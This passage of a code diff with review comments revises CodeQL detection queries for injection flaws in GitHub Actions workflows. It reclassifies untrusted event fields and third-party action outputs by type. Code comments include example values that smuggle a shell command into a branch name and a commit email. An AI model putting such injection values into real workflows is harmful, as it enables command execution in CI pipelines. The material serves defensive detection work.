https://docs.github.com/en/get-started/using-git/dealing-with-special-characters-in-branch-and-tag-names + // - They can include slash / for hierarchical (directory) grouping, but no slash-separated component can begin with a dot . or end with the sequence .lock. + // - They must contain at least one / + // - They cannot have two consecutive dots .. anywhere. + // - They cannot have ASCII control characters (i.e. bytes whose values are lower than \040, or \177 DEL), space, tilde ~, caret ^, or colon : anywhere. + // - They cannot have question-mark ?, asterisk *, or open bracket [ anywhere. + // - They cannot begin or end with a slash / or contain multiple consecutive slashes + // - They cannot end with a dot . 
+ // - They cannot contain a sequence @{ + // - They cannot be the single character @ + // - They cannot contain a \ + // eg: zzz";echo${IFS}"hello";# would be a valid branch name + "github\\.event\\.pull_request\\.head\\.repo\\.default_branch", + "github\\.event\\.pull_request\\.head\\.ref", "github\\.head_ref", + "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.head_branch", + "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", + ] + | + Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) + ) } bindingset[context] -private predicate isExternalUserControlledGollum(string context) { +private predicate labelEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.pages\\[[0-9]+\\]\\.page_name", - "github\\.event\\.pages\\[[0-9]+\\]\\.title" + // label + // - They cannot contain a escaping \ + "github\\.event\\.pull_request\\.head\\.label", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
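Review bot: `branchEvent` lists `"github\\.event\\.workflow_run\\.head_branch"` twice; the second entry is redundant and should be dropped. The rules comment above it is copied from the full-refname rules and keeps the bullet "They must contain at least one /", which does not hold for the branch names these fields carry (`github.head_ref` is routinely a one-level name such as `main`), and since a reader will use this comment to judge what a "branch" value can contain it should be reworded to `// - Branch names are one-level refs, so a / is not required` or removed. The example already in the comment shows that quotes, `;` and `${IFS}` survive the ref rules, so the "branch" flag must not be read downstream as a shell-safe category. `labelEvent`'s closing lines fall in the next hunk.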
@@ -76,19 +137,18 @@ private predicate isExternalUserControlledGollum(string context) { } bindingset[context] -private predicate isExternalUserControlledCommit(string context) { +private predicate emailEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.commits\\[[0-9]+\\]\\.message", "github\\.event\\.head_commit\\.message", + // email + // `echo${IFS}hello`@domain.com "github\\.event\\.head_commit\\.author\\.email", - "github\\.event\\.head_commit\\.author\\.name", "github\\.event\\.head_commit\\.committer\\.email", - "github\\.event\\.head_commit\\.committer\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", - "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
@@ -96,32 +156,31 @@ private predicate isExternalUserControlledCommit(string context) { } bindingset[context] -private predicate isExternalUserControlledDiscussion(string context) { +private predicate usernameEvent(string context) { exists(string reg | - reg = ["github\\.event\\.discussion\\.title", "github\\.event\\.discussion\\.body"] + reg = + [ + // username + // All characters must be either a hyphen (-) or alphanumeric + "github\\.event\\.head_commit\\.author\\.name", + "github\\.event\\.head_commit\\.committer\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", + "github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", + "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } bindingset[context] -private predicate isExternalUserControlledWorkflowRun(string context) { +private predicate pathEvent(string context) { exists(string reg | reg = [ - "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.display_title", - "github\\.event\\.workflow_run\\.head_branch", - "github\\.event\\.workflow_run\\.head_repository\\.description", - "github\\.event\\.workflow_run\\.head_repository\\.full_name", - "github\\.event\\.workflow_run\\.head_repository\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.message", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", - "github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", - "github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.repo\\.name", + // filename + "github\\.event\\.workflow\\.path", ] | 
Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) 
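Review bot: `usernameEvent` annotates `head_commit.author.name`, `head_commit.committer.name` and the `commits[]` and `workflow_run.head_commit` counterparts with "All characters must be either a hyphen (-) or alphanumeric", but as far as I can tell these payload fields carry the git ident name taken from the commit object (the GitHub login is the separate `author.username` field), and git does not restrict that string to such a character set — spaces, quotes and most shell metacharacters survive. Flagging them as "username" therefore understates them relative to the `emailEvent` entries, which the previous hunk already documents as injectable. Unless a test shows otherwise, move these six entries to `textEvent` (or keep the predicate but bind `flag = "text"` for it in `EventSource`) and replace the comment with `// git ident name from the commit object: free-form text, not a GitHub login`. `pathEvent`'s closing lines fall in the next hunk.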
@@ -129,45 +188,52 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } bindingset[context] -private predicate isExternalUserControlledRepositoryDispatch(string context) { +private predicate jsonEvent(string context) { exists(string reg | - reg = ["github\\.event\\.client_payload\\[[0-9]+\\]", "github\\.event\\.client_payload",] + reg = + [ + // json + "github\\.event", + ] | Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) ) } -bindingset[context] -private predicate isExternalUserControlledWorkflowDispatch(string context) { - exists(string reg | reg = ["github\\.event\\.inputs\\[[0-9]+\\]", "github\\.event\\.inputs",] | - Utils::normalizeExpr(context).regexpMatch(Utils::wrapRegexp(reg)) - ) -} +class EventSource extends RemoteFlowSource { + string flag; -private class EventSource extends RemoteFlowSource { EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - isExternalUserControlled(context) or - isExternalUserControlledIssue(context) or - isExternalUserControlledPullRequest(context) or - isExternalUserControlledReview(context) or - isExternalUserControlledComment(context) or - isExternalUserControlledGollum(context) or - isExternalUserControlledCommit(context) or - isExternalUserControlledDiscussion(context) or - isExternalUserControlledWorkflowRun(context) or - isExternalUserControlledRepositoryDispatch(context) or - isExternalUserControlledWorkflowDispatch(context) + titleEvent(context) and flag = "title" + or + urlEvent(context) and flag = "url" + or + textEvent(context) and flag = "text" + or + repoNameEvent(context) and flag = "repo name" + or + branchEvent(context) and flag = "branch" + or + labelEvent(context) and flag = "label" + or + emailEvent(context) and flag = "email" + or + usernameEvent(context) and flag = "username" + or + pathEvent(context) and flag = "filename" + or + jsonEvent(context) and flag = "json" ) } - override string getSourceType() { result 
= "User-controlled events" } + override string getSourceType() { result = flag } } /** * A Source of untrusted data defined in a MaD specification */ -private class ExternallyDefinedSource extends RemoteFlowSource { +class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } @@ -178,19 +244,19 @@ private class ExternallyDefinedSource extends RemoteFlowSource { /** * An input for a Composite Action */ -private class CompositeActionInputSource extends RemoteFlowSource { +class CompositeActionInputSource extends RemoteFlowSource { CompositeAction c; CompositeActionInputSource() { c.getAnInput() = this.asExpr() } - override string getSourceType() { result = "Composite action input" } + override string getSourceType() { result = "input" } } /** * A downloadeded artifact. */ -private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } +private class ArtifactSource extends RemoteFlowSource { + ArtifactSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } - override string getSourceType() { result = "Step output from Artifact" } + override string getSourceType() { result = "artifact" } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index cdcc1dbdf818..6e6e768bdf79 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
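Review bot: `EventSource` now binds `flag` through a disjunction over the category predicates, so a context that satisfies more than one of them yields several `getSourceType()` results for the same node; with `jsonEvent` reduced to the bare pattern `"github\\.event"`, whether that overlaps every other category depends on how `Utils::wrapRegexp` anchors the pattern, which is not visible here. If the intent is that `json` matches only the whole payload, a test with `${{ github.event }}` and `${{ github.event.issue.body }}` pinning exactly one type each would document it. The flag strings are now a contract shared with the MaD rows changed in this commit (`filename`, `text`, `branch`, ...), yet `repo name` is the only multi-word value and the class was made public without a QLDoc listing the accepted values; suggest a QLDoc on `EventSource` enumerating the flags and what each category guarantees. `ExternallyDefinedSource` starts at the end of this hunk and its closing lines are outside it.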
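Review bot: `ExternallyDefinedSource` and `CompositeActionInputSource` lose their `private` modifier in this hunk while the renamed `ArtifactSource` keeps it, so queries that select sources by class can reach two of the three; if widening the API is deliberate, `ArtifactSource` should follow, otherwise all three should stay `private` and selection should go through `getSourceType()`. The new `input` type for composite-action inputs has no counterpart in `EventSource`, where `github.event.inputs` is filed under `text`; document which one a query should expect for caller-supplied input, e.g. `/** An input of a composite action; source type "input" (workflow_dispatch inputs are reported as "text"). */` on `CompositeActionInputSource`.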
@@ -7,14 +7,6 @@ import codeql.actions.DataFlow abstract class EnvVarInjectionSink extends DataFlow::Node { } -// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { -// exists(Expression expr, Run run, string varName, string key, string value | -// expr = run.getInScopeEnvVarExpr(varName) and -// Utils::writeToGitHubEnv(run, key, value) and -// expr = sink.asExpr() and -// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") -// ) -// } class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, Expression expr, string varname, string key, string value | diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 63e99abd4d35..fe3c3e58b5f9 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files", "manual"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "json", "manual"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index f2b8c8549a90..4d12a2936969 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title", "manual"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"] 
diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml
index 21688675a2ed..a4539923b35f 100644
--- a/ql/lib/ext/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/cypress-io_github-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["cypress-io/github-action", "*", "env.GH_BRANCH", "PR branch", "manual"]
+ - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"]
diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
index f90eaeb7271b..472778d33b4b 100644
--- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml
+++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dawidd6/action-download-artifact", "*", "output.artifacts", "Artifact details", "manual"]
+ - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"]
diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml
index 14743f2819ed..79621a6a30c6 100644
--- a/ql/lib/ext/dorny_paths-filter.model.yml
+++ b/ql/lib/ext/dorny_paths-filter.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["dorny/paths-filter", "*", "output.changes", "PR changed files", "manual"]
+ - ["dorny/paths-filter", "*", "output.changes", "filename", "manual"]
diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
index ecfce617df45..71d837742315 100644
--- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
+++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "PR body", "manual"]
- - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "PR title", "manual"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"]
+ - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_TITLE", "title", "manual"]
diff --git a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
index acb5d462d15a..062203945c50 100644
--- a/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
+++ b/ql/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml
@@ -8,4 +8,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "PR changed files", "manual"]
+ - ["googlecloudplatform/magic-modules", "*", "output.changed-files", "filename", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
index 0d96077345f5..9cc02d3b38c7 100644
--- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"]
+ - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml
index 38253b689340..e74f953a1a15 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.model.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml
@@ -3,10 +3,10 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["jitterbit/get-changed-files", "*", "output.all", "PR changed files", "manual"]
- - ["jitterbit/get-changed-files", "*", "output.added", "PR changed files", "manual"]
- - ["jitterbit/get-changed-files", "*", "output.modified", "PR changed files", "manual"]
- - ["jitterbit/get-changed-files", "*", "output.removed", "PR changed files", "manual"]
- - ["jitterbit/get-changed-files", "*", "output.renamed", "PR changed files", "manual"]
- - ["jitterbit/get-changed-files", "*", "output.added_modified", "PR changed files", "manual"]
- - ["jitterbit/get-changed-files", "*", "output.deleted", "PR changed files", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.modified", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.removed", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.renamed", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.added_modified", "filename", "manual"]
+ - ["jitterbit/get-changed-files", "*", "output.deleted", "filename", "manual"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index bbfc0bed1dfb..9a58d9a764ff 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] - - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "Comment body", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] + - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index 7a556a0f0ece..c8646cffe8ef 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 9b0ec011fd62..a85a4b466e25 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"] + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index 753303b0cb3d..d98eda4e69f8 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml 
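Review bot: The two rows of the `khan/pull-request-comment-trigger` model are identical (`output.comment_body`, `text`, `manual`) both before and after the retagging, so one of them is redundant and the model declares the same source twice. The hunk only changes the type string, so this is pre-existing, but since both lines are touched here it is the natural moment to drop the second row.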
@@ -4,7 +4,7 @@ extensions: extensible: sourceModel data: # https://github.com/tj-actions/branch-names - - ["tj-actions/branch-names", "*", "output.current_branch", "PR current branch", "manual"] - - ["tj-actions/branch-names", "*", "output.head_ref_branch", "PR head branch", "manual"] - - ["tj-actions/branch-names", "*", "output.ref_branch", "Branch tirggering workflow run", "manual"] + - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.head_ref_branch", "branch", "manual"] + - ["tj-actions/branch-names", "*", "output.ref_branch", "branch", "manual"] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index fb15abce061d..60fa01495733 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml 
@@ -3,20 +3,20 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/changed-files", "*", "output.added_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.copied_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.deleted_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.modified_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.renamed_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.type_changed_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.unmerged_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.unknown_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.all_changed_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.other_changed_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.all_modified_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.other_modified_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.other_deleted_files", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.modified_keys", "PR changed files", "manual"]
- - ["tj-actions/changed-files", "*", "output.changed_keys", "PR changed files", "manual"]
+ - ["tj-actions/changed-files", "*", "output.added_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.copied_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.deleted_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.modified_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.renamed_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_old_new_renamed_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.type_changed_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.unmerged_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.unknown_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_and_modified_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_changed_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.other_changed_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.all_modified_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.other_modified_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.other_deleted_files", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.modified_keys", "filename", "manual"]
+ - ["tj-actions/changed-files", "*", "output.changed_keys", "filename", "manual"]
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.model.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
index 8e4938368b8c..9dccf6d5e6c6 100644
--- a/ql/lib/ext/tj-actions_verify-changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_verify-changed-files.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tj-actions/verify-changed-files", "*", "output.changed-files", "PR changed files", "manual"]
+ - ["tj-actions/verify-changed-files", "*", "output.changed-files", "filename", "manual"]
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
index 61141e5f73ba..b8fb2514253c 100644
--- a/ql/lib/ext/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -3,7 +3,7 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["trilom/file-changes-action", "*", "output.files", "PR changed files", "manual"]
- - ["trilom/file-changes-action", "*", "output.files_added", "PR changed files", "manual"]
- - ["trilom/file-changes-action", "*", "output.files_modified", "PR changed files", "manual"]
- - ["trilom/file-changes-action", "*", "output.files_removed", "PR changed files", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_modified", "filename", "manual"]
+ - ["trilom/file-changes-action", "*", "output.files_removed", "filename", "manual"]
diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml
index c80590e49315..499161aafcb3 100644
--- a/ql/lib/ext/tzkhan_pr-update-action.model.yml
+++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml
@@ -3,4 +3,4 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["tzkhan/pr-update-action", "*", "output.headMatch", "", "manual"]
+ - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"]
diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml
index 2a4378d17126..173ecfc4222f 100644
--- a/ql/lib/ext/xt0rted_slash-command-action.model.yml
+++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml
@@ -3,5 +3,5 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sourceModel
 data:
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
- - ["xt0rted/slash-command-action", "*", "output.command-arguments", "", "manual"]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
+ - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"]
diff --git a/ql/src/Security/CWE-077/EnvPathInjection.ql b/ql/src/Security/CWE-077/EnvPathInjection.ql
index 720b7aed8cc4..50ad01497035 100644
--- a/ql/src/Security/CWE-077/EnvPathInjection.ql
+++ b/ql/src/Security/CWE-077/EnvPathInjection.ql
@@ -25,6 +25,12 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 not j.isPrivileged()
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvPathInjectionFromFileReadSink
 )
 )
 select sink.getNode(), source, sink,
diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql
index af3f2998cc9d..109d77d74256 100644
--- a/ql/src/Security/CWE-077/EnvVarInjection.ql
+++ b/ql/src/Security/CWE-077/EnvVarInjection.ql
@@ -25,7 +25,14 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 not j.isPrivileged()
- )
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvVarInjectionFromFileReadSink
+ ) and
+ not source.getNode().(RemoteFlowSource).getSourceType() = "branch"
 )
 select sink.getNode(), source, sink,
 "Potential environment variable injection in $@, which may be controlled by an external user.",
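Review bot: The disjunction added to EnvPathInjection.ql, `not X = "artifact" or X = "artifact" and sink.getNode() instanceof EnvPathInjectionFromFileReadSink`, repeats the `source.getNode().(RemoteFlowSource).getSourceType()` cast twice and is a conditional in disguise; `not A or (A and B)` is just `not A or B`, which QL spells `source.getNode().(RemoteFlowSource).getSourceType() = "artifact" implies sink.getNode() instanceof EnvPathInjectionFromFileReadSink`. The same six-line block is copy-pasted into EnvVarInjection.ql in this hunk group and into the two Privileged*.ql hunks that follow, so a single library predicate (say `artifactSourceOnlyViaFileRead(source, sink)`, taking the file-read sink class as the varying part) would keep the four queries from drifting apart the next time the rule changes. The `where` clause these lines belong to begins before the hunk.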
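Review bot: The final clause added to EnvVarInjection.ql, `not source.getNode().(RemoteFlowSource).getSourceType() = "branch"`, removes every branch-kind source (the tj-actions/branch-names and tzkhan/pr-update-action rows relabelled earlier in this patch) from the non-privileged env-var query, while EnvPathInjection.ql in the same patch keeps them, and PrivilegedEnvVarInjection.ql below makes the same asymmetric choice. Presumably the reasoning is that a git ref name cannot carry the newline needed to append a second `KEY=value` line to $GITHUB_ENV, whereas a PATH entry needs none, but nothing on the page says so. A one-line comment above the clause stating that rationale, e.g. `// branch names are excluded here (but not in EnvPathInjection): <reason>`, would stop the next reader from treating the exclusion as a false negative and reverting it. The `where` clause begins before the hunk.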
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
index 3e7c74ab895e..593fd620c9f5 100644
--- a/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
+++ b/ql/src/Security/CWE-077/PrivilegedEnvPathInjection.ql
@@ -22,6 +22,12 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 j.isPrivileged()
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvPathInjectionFromFileReadSink
 )
 select sink.getNode(), source, sink,
 "Potential privileged PATH environment variable injection in $@, which may be controlled by an external user.",
diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
index aac7568e6548..bf637af11958 100644
--- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
+++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql
@@ -22,7 +22,14 @@ where
 exists(Job j |
 j = sink.getNode().asExpr().getEnclosingJob() and
 j.isPrivileged()
- )
+ ) and
+ (
+ not source.getNode().(RemoteFlowSource).getSourceType() = "artifact"
+ or
+ source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and
+ sink.getNode() instanceof EnvVarInjectionFromFileReadSink
+ ) and
+ not source.getNode().(RemoteFlowSource).getSourceType() = "branch"
 select sink.getNode(), source, sink,
